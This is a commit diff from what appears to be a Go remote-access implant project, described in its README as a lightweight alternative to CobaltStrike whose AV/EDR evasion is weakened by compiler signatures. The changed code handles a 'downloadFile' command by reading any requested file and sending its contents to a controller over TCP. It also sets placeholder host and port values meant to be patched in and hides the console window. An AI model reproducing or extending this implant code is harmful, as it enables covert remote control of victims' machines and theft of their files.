makeW

admi-n · Feb 18, 2024 · 1419617 · 1419617
1 parent d418368
commit 1419617
Show file tree

Hide file tree

Showing 6 changed files with 45 additions and 36 deletions.
diff --git a/ClientGo/Linux/HandlePacket/Packet.go b/ClientGo/Linux/HandlePacket/Packet.go
@@ -328,8 +328,10 @@ func Read(Data []byte, Connection net.Conn) {
 	case "downloadFile":
 		{
 			FilePath := unmsgpack.ForcePathObject("FilePath").GetAsString()
+			// 将所有的反斜杠替换为斜杠
 			normalizedPathStr := strings.ReplaceAll(FilePath, "\\", "/")
-
+			//println(normalizedPathStr)
+			// 读取文件到字节数组
 			data, err := ioutil.ReadFile(normalizedPathStr)
 			if err != nil {
 
@@ -340,20 +342,20 @@ func Read(Data []byte, Connection net.Conn) {
 				msgpack.ForcePathObject("Controler_HWID").SetAsString(unmsgpack.ForcePathObject("HWID").GetAsString())
 				msgpack.ForcePathObject("Message").SetAsString(err.Error())
 				msgpack.ForcePathObject("ListenerName").SetAsString(PcInfo.ListenerName)
-				//Log(PcInfo.GetHWID()+":download successful", Connection, *unmsgpack)
 				TCPsocket.Send(Connection, msgpack.Encode2Bytes())
 
+			} else {
+				msgpack := new(MessagePack.MsgPack)
+				msgpack.ForcePathObject("Pac_ket").SetAsString("fileDownload")
+				msgpack.ForcePathObject("ProcessID").SetAsString(PcInfo.GetProcessID())
+				msgpack.ForcePathObject("DWID").SetAsString(unmsgpack.ForcePathObject("DWID").GetAsString())
+				msgpack.ForcePathObject("Controler_HWID").SetAsString(unmsgpack.ForcePathObject("HWID").GetAsString())
+				msgpack.ForcePathObject("FileName").SetAsString(unmsgpack.ForcePathObject("FileName").GetAsString())
+				msgpack.ForcePathObject(("Data")).SetAsBytes(data)
+				msgpack.ForcePathObject("ListenerName").SetAsString(PcInfo.ListenerName)
+				//Log(PcInfo.GetHWID()+":download successful", Connection, *unmsgpack)
+				TCPsocket.Send(Connection, msgpack.Encode2Bytes())
 			}
-			msgpack := new(MessagePack.MsgPack)
-			msgpack.ForcePathObject("Pac_ket").SetAsString("fileDownload")
-			msgpack.ForcePathObject("ProcessID").SetAsString(PcInfo.GetProcessID())
-			msgpack.ForcePathObject("DWID").SetAsString(unmsgpack.ForcePathObject("DWID").GetAsString())
-			msgpack.ForcePathObject("Controler_HWID").SetAsString(unmsgpack.ForcePathObject("HWID").GetAsString())
-			msgpack.ForcePathObject("FileName").SetAsString(unmsgpack.ForcePathObject("FileName").GetAsString())
-			msgpack.ForcePathObject(("Data")).SetAsBytes(data)
-			msgpack.ForcePathObject("ListenerName").SetAsString(PcInfo.ListenerName)
-			//Log(PcInfo.GetHWID()+":download successful", Connection, *unmsgpack)
-			TCPsocket.Send(Connection, msgpack.Encode2Bytes())
 		}
 
 	case "NewFolder":

diff --git a/ClientGo/Linux/LinuxMain b/ClientGo/Linux/LinuxMain
diff --git a/ClientGo/Windows/HandlePacket/Packet.go b/ClientGo/Windows/HandlePacket/Packet.go
@@ -220,19 +220,27 @@ func Read(Data []byte, Connection net.Conn) {
 			data, err := ioutil.ReadFile(normalizedPathStr)
 			if err != nil {
 
-				//Log("Error downloading:"+err.Error(), Connection, *unmsgpack)
+				msgpack := new(MessagePack.MsgPack)
+				msgpack.ForcePathObject("Pac_ket").SetAsString("fileError")
+				msgpack.ForcePathObject("ProcessID").SetAsString(PcInfo.GetProcessID())
+				msgpack.ForcePathObject("DWID").SetAsString(unmsgpack.ForcePathObject("DWID").GetAsString())
+				msgpack.ForcePathObject("Controler_HWID").SetAsString(unmsgpack.ForcePathObject("HWID").GetAsString())
+				msgpack.ForcePathObject("Message").SetAsString(err.Error())
+				msgpack.ForcePathObject("ListenerName").SetAsString(PcInfo.ListenerName)
+				TCPsocket.Send(Connection, msgpack.Encode2Bytes())
 
+			} else {
+				msgpack := new(MessagePack.MsgPack)
+				msgpack.ForcePathObject("Pac_ket").SetAsString("fileDownload")
+				msgpack.ForcePathObject("ProcessID").SetAsString(PcInfo.GetProcessID())
+				msgpack.ForcePathObject("DWID").SetAsString(unmsgpack.ForcePathObject("DWID").GetAsString())
+				msgpack.ForcePathObject("Controler_HWID").SetAsString(unmsgpack.ForcePathObject("HWID").GetAsString())
+				msgpack.ForcePathObject("FileName").SetAsString(unmsgpack.ForcePathObject("FileName").GetAsString())
+				msgpack.ForcePathObject(("Data")).SetAsBytes(data)
+				msgpack.ForcePathObject("ListenerName").SetAsString(PcInfo.ListenerName)
+				//Log(PcInfo.GetHWID()+":download successful", Connection, *unmsgpack)
+				TCPsocket.Send(Connection, msgpack.Encode2Bytes())
 			}
-			msgpack := new(MessagePack.MsgPack)
-			msgpack.ForcePathObject("Pac_ket").SetAsString("fileDownload")
-			msgpack.ForcePathObject("ProcessID").SetAsString(PcInfo.GetProcessID())
-			msgpack.ForcePathObject("DWID").SetAsString(unmsgpack.ForcePathObject("DWID").GetAsString())
-			msgpack.ForcePathObject("Controler_HWID").SetAsString(unmsgpack.ForcePathObject("HWID").GetAsString())
-			msgpack.ForcePathObject("FileName").SetAsString(unmsgpack.ForcePathObject("FileName").GetAsString())
-			msgpack.ForcePathObject(("Data")).SetAsBytes(data)
-			msgpack.ForcePathObject("ListenerName").SetAsString(PcInfo.ListenerName)
-			//Log(PcInfo.GetHWID()+":download successful", Connection, *unmsgpack)
-			TCPsocket.Send(Connection, msgpack.Encode2Bytes())
 		}
 
 	case "NewFolder":

diff --git a/ClientGo/Windows/WinMain.exe b/ClientGo/Windows/WinMain.exe
diff --git a/ClientGo/Windows/main.go b/ClientGo/Windows/main.go
@@ -9,6 +9,7 @@ import (
 	"main/TCPsocket"
 	"math/rand"
 	"net"
+	"strings"
 	"sync"
 	"time"
 
@@ -194,16 +195,16 @@ func HideConsole() {
 }
 func main() {
 
-	// Host := "HostAAAABBBBCCCCDDDD"
-	// Port := "PortAAAABBBBCCCCDDDD"
-	// ListenerName := "ListenNameAAAABBBBCCCCDDDD"
-	// PcInfo.Host = strings.ReplaceAll(Host, " ", "")
-	// PcInfo.Port = strings.ReplaceAll(Port, " ", "")
-	// PcInfo.ListenerName = strings.ReplaceAll(ListenerName, " ", "")
+	Host := "HostAAAABBBBCCCCDDDD"
+	Port := "PortAAAABBBBCCCCDDDD"
+	ListenerName := "ListenNameAAAABBBBCCCCDDDD"
+	PcInfo.Host = strings.ReplaceAll(Host, " ", "")
+	PcInfo.Port = strings.ReplaceAll(Port, " ", "")
+	PcInfo.ListenerName = strings.ReplaceAll(ListenerName, " ", "")
 
-	PcInfo.Host = "192.168.31.81"
-	PcInfo.Port = "4000"
-	PcInfo.ListenerName = "asd"
+	// PcInfo.Host = "192.168.31.81"
+	// PcInfo.Port = "4000"
+	// PcInfo.ListenerName = "asd"
 	HideConsole()
 	PcInfo.IsDotNetFour = checkDotNetFramework40()
 	ClientWorking = true

diff --git a/README.md b/README.md
@@ -18,7 +18,7 @@
 
 - 控制端(Controller)UI轻量级交互界面，内存占用大约是CobaltStrike的60分之一，是Metasploit的10分之一
 
-- 用Golang编译后的客户端体积较大，因此免杀效果较差（Golang的编译器特征已经被部分AV/EDR厂商标黑了）
+- Golang的编译器特征已经被部分AV/EDR厂商标黑了,因此免杀效果较差
 
 
 
@@ -114,7 +114,7 @@ demo
 
 - 编写lua更多的，集成更多的内网渗透插件。
 
-- 目前Golang的控制台隐藏问题还无法得到很好的方案，如果您知道如何解决请联系我。
+- 目前Golang的控制台隐藏问题还无法得到很好的方案，如果您知道如何解决这个问题请联系我。
 
 
 
@@ -130,5 +130,3 @@ demo
 
 
 
-参考
-